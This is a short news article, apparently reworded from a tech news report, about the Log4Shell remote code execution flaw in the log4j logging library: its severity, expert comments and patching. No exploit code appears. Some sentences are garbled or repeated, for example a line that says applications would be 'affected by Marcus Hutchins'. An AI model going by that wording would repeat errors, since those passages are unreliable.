The image is by Alex Castro.
A previously unknown vulnerability called Log4Shell has the potential to let hackers compromise millions of devices across the internet, and security teams at companies large and small are scrambling to patch it.
If exploited, the vulnerability allows remote code execution on vulnerable server, giving an attacker the ability to import malicious software that would compromise machines.
log4j is an open-sourced logging library used by apps and services across the internet. Logging is a process where applications keep a running list of activities they have performed which can be reviewed in case of error. Log4j is a popular library because nearly every network security system runs a logging process.
There are only two other exploits that have the same severity over the last 10 years.
Millions of applications would be affected by Marcus Hutchins, a prominent security researcher best known for stopping the global WannaCry malware attack. Hutchins said that Log4j is used by millions of applications and that the attacker needs to get the app to log a special string.
The vulnerability was discovered on sites that hosted the server of the popular game. GreyNoise reported that it had detected numerous internet search engines looking for machines that were vulnerable to the exploit.
A post on the Luna Sec website claimed that Apple's iCloud and gaming platform Steam were vulnerable. Neither Apple nor Valve responded to the request for comment.
An attacker needs to cause the application to save a special string of characters in order to exploit the vulnerability. The vulnerability is easy to exploit and can be triggered in a variety of ways because applications log a wide range of events.
John Graham-Cumming, the CTO of Cloudflare, told The Verge that this is a very serious vulnerability because of the widespread use of Java. There is a lot of Java software connected to the internet. There are only two other exploits that have the same severity, Heartbleed and Shellshock, which allowed you to run code on a remote machine.
The diversity of applications that are vulnerable to the exploit and range of delivery mechanisms mean that there is still risk. The exploit could be carried out physically by hiding the attack string in a QR code that was scanned by a package delivery company, making it way into the system without having been sent directly over the internet.
An update to the log4j library has been released to mitigate against the vulnerability, but given the time taken to ensure that all vulnerable machines are updated, Log4Shell remains a pressing threat.
